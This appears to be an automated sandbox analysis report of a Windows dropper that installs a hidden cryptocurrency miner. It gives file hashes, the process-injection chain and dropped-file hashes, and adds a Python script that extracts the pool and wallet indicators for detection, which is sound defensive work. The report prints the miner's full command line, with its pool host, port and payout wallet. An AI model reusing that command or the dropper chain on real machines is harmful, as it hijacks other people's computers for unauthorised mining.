Analysis
-
max time kernel
295s
-
max time network
298s
-
platform
windows10-1703_x64
-
resource
win10-20231215-ja
-
resource tags
arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system, windows
-
submitted
11/02/2024, 22:53
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid   Process
3480  b2e.exe
1144  cpuminer-sse2.exe
-
Loads dropped DLL 5 IoCs
pid   Process
1144  cpuminer-sse2.exe
1144  cpuminer-sse2.exe
1144  cpuminer-sse2.exe
1144  cpuminer-sse2.exe
1144  cpuminer-sse2.exe
(all five DLL loads are attributed to the same cpuminer-sse2.exe process)
-
YARA rule match 1 IoCs
resource                                                                              yara_rule
behavioral1/memory/5004-6-0x0000000000400000-0x000000000393A000-memory.dmp            upx
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description                        pid   Process      procid_target
PID 5004 wrote to memory of 3480   5004  batexe.exe   74
PID 5004 wrote to memory of 3480   5004  batexe.exe   74
PID 5004 wrote to memory of 3480   5004  batexe.exe   74
PID 3480 wrote to memory of 3568   3480  b2e.exe      75
PID 3480 wrote to memory of 3568   3480  b2e.exe      75
PID 3480 wrote to memory of 3568   3480  b2e.exe      75
PID 3568 wrote to memory of 1144   3568  cmd.exe      78
PID 3568 wrote to memory of 1144   3568  cmd.exe      78
Processes
-
1. C:\Users\Admin\AppData\Local\Temp\batexe.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   - Suspicious use of WriteProcessMemory
   PID:5004
   2. C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:3480
      3. C:\Windows\SysWOW64\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D949.tmp\batchfile.bat" "
         - Suspicious use of WriteProcessMemory
         PID:3568
         4. C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            - Executes dropped EXE
            - Loads dropped DLL
            PID:1144
-
-
-
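The process chain in this report (batexe.exe writing into the dropped b2e.exe, b2e.exe spawning cmd.exe to run batchfile.bat, and cmd.exe launching cpuminer-sse2.exe against a stratum pool) is exactly what an analyst wants to pull out of a sandbox report automatically rather than by eye. The Python below is an added example; it is not part of the sandbox report and not code from any tool the report names. Its WPM_EVENTS and COMMAND_LINES inputs are constructed from the WriteProcessMemory records and the process list above, and the names build_tree, lineage, parse_miner_cmdline and find_miners are this example's own. It rebuilds parent/child relationships from the WriteProcessMemory records, taking the first writer into a not-yet-seen target PID as its parent (an assumption that holds here because each target is written only by the process that spawned it), then extracts the pool host and port, algorithm, payout address and thread count from the miner command line. One caveat for anyone reading the tree: the image path C:\Windows\SysWOW64\cmd.exe next to a command line that names system32\cmd.exe is WoW64 file-system redirection, which tells you the parent b2e.exe is a 32-bit process.

```python
import re
from collections import defaultdict

# Constructed from the report's "Suspicious use of WriteProcessMemory" table:
# (source pid, source image, target pid). Repeated rows are kept as listed.
WPM_EVENTS = [
    (5004, "batexe.exe", 3480),
    (5004, "batexe.exe", 3480),
    (5004, "batexe.exe", 3480),
    (3480, "b2e.exe", 3568),
    (3480, "b2e.exe", 3568),
    (3480, "b2e.exe", 3568),
    (3568, "cmd.exe", 1144),
    (3568, "cmd.exe", 1144),
]

# Constructed from the report's process list: pid -> command line.
COMMAND_LINES = {
    5004: r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"',
    3480: r'"C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"',
    3568: r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D949.tmp\batchfile.bat" "',
    1144: "cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3",
}


def build_tree(events):
    """Collapse (possibly repeated) WPM records into parent and children maps.
    Assumption (this example's, true for this report): the first process that
    writes into a fresh target PID is the one that created it."""
    parent = {}
    children = defaultdict(list)
    for src, _image, dst in events:
        if dst not in parent:
            parent[dst] = src
            children[src].append(dst)
    return parent, children


def lineage(parent, pid):
    """Return the ancestry chain root -> ... -> pid."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return list(reversed(chain))


# stratum+tcp://host:port is the pool argument cpuminer-style miners take with -o.
STRATUM_RE = re.compile(r"(stratum\+(?:tcp|tcps|ssl))://([^\s:/]+):(\d+)", re.IGNORECASE)


def parse_miner_cmdline(cmdline):
    """Extract pool and credential indicators from a cpuminer-style command line.
    Returns None when the command line carries no stratum pool argument."""
    m = STRATUM_RE.search(cmdline)
    if not m:
        return None
    scheme, host, port = m.groups()
    info = {"scheme": scheme.lower(), "pool_host": host, "pool_port": int(port)}
    algo = re.search(r"(?:^|\s)(?:-a|--algo)[=\s]+(\S+)", cmdline)
    if algo:
        info["algo"] = algo.group(1)
    userpass = re.search(r"--userpass[=\s]+(\S+)", cmdline)
    if userpass:
        # Pools such as the one in this report use wallet:password; the password
        # field here selects the payout coin (c=doge).
        wallet, _, password = userpass.group(1).partition(":")
        info["wallet"] = wallet
        info["password"] = password
    threads = re.search(r"(?:^|\s)(?:-t|--threads)[=\s]+(\d+)", cmdline)
    if threads:
        info["threads"] = int(threads.group(1))
    return info


def find_miners(command_lines, parent):
    """One finding per process whose command line points at a stratum pool,
    each carrying the ancestry chain that spawned it."""
    findings = []
    for pid, cmd in command_lines.items():
        info = parse_miner_cmdline(cmd)
        if info:
            info["pid"] = pid
            info["lineage"] = lineage(parent, pid)
            findings.append(info)
    return findings


if __name__ == "__main__":
    parent_map, _children = build_tree(WPM_EVENTS)
    for finding in find_miners(COMMAND_LINES, parent_map):
        print(finding)
```

Run stand-alone it prints one finding for PID 1144 with the zpool host and port, the yespower algorithm, the payout address from --userpass and the lineage 5004 -> 3480 -> 3568 -> 1144. The pool host, port and wallet are the indicators worth pivoting on across other reports; the dropped file names (D438.tmp, D949.tmp) are per-run temp names and are not.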
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 2.3MB
MD5 6f194119986e66084a37fab2118104f0
SHA1 29d570973321b91b8b0aa7c9c787348db750caf4
SHA256 912371d8c061c9764690803f3d776e09c693f88d66bedccb568bc78488d1f2ba
SHA512 e1152862cef40fbb2f7eca2adc58648658dd5953fa7b803550d68ba22991deab8f55df3967509e39a140834937806a5ed7881c09fdea3c7c27a0c4535a63fe07
-
Filesize 3.4MB
MD5 469424e937356dea074c63081720fe60
SHA1 d14394b46fcd54d4411d476a533a3e93c8dea268
SHA256 9215bfb29240d1e784c2418fe7b634ea1c930c61530c57e74977d326e33d6eed
SHA512 602eae5f59014da9074de6184fdb5e6fd6b6b89af487698b3255672681a2f2847d4c94b0bc4d6198fee64dfb59715886d0297b41e74d5746b0a70652b26617f2
-
Filesize 136B
MD5 8ea7ac72a10251ecfb42ef4a88bd330a
SHA1 c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA256 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512 a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize 2.3MB
MD5 4c04147c386ba8792ac6a03069572a8a
SHA1 dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256 c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512 a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize 836KB
MD5 aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA1 5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256 218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512 c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize 221KB
MD5 e42bb3d38ed6b3d1b058511eeb6fc3a5
SHA1 bd2ac7f9213751b1c78a093b9e6be84a21dffa15
SHA256 839a34c0f06d17002a3a3ed1b2cc2177f7d7786e034876df0fb5fc3b6bf07281
SHA512 d176f37dd8fa8ae1621aba5a54ba973d9a33f8586ee12f771f3d5905b0ea9297ad4787ddfaf608c3f36ba963d055958dd2cc8b2475e576a260ea7aa7b217f21a
-
Filesize 256KB
MD5 f8edb8dd2fb15f1887ace09587589dd4
SHA1 cbf7cbfefc0215d9500a98d9064deb9e86787152
SHA256 0465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b
SHA512 aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc
-
Filesize 256KB
MD5 1d86b9560854472453237bcbaa2e253f
SHA1 5a03a7902d250377a3e9f746badcb696e2c98228
SHA256 1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d
SHA512 afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699
-
Filesize 213KB
MD5 146f4a7e15cc081a5329cc4b85f66d5f
SHA1 758aed6fcc7258ca8bd888154078ac136dad74b8
SHA256 4af2f105c81385eeab0eebbf0e252de530c3f9edb27821ba5dbfcffc9e1cf290
SHA512 a6b5a1fd6f791c15ed4c897b24156b54d61912b3397665efe51c9623da1b2c2f9f7a6cc575c2c7c89349eeeeeec4e7de835d88cb9fcfe05e5d032c4e71591bfc
-
Filesize 320KB
MD5 1ae43cc09627ff82d15527ea2693fd76
SHA1 c39ffa1a4b80c29fa1f5caed3e7d091253266c66
SHA256 b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f
SHA512 21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271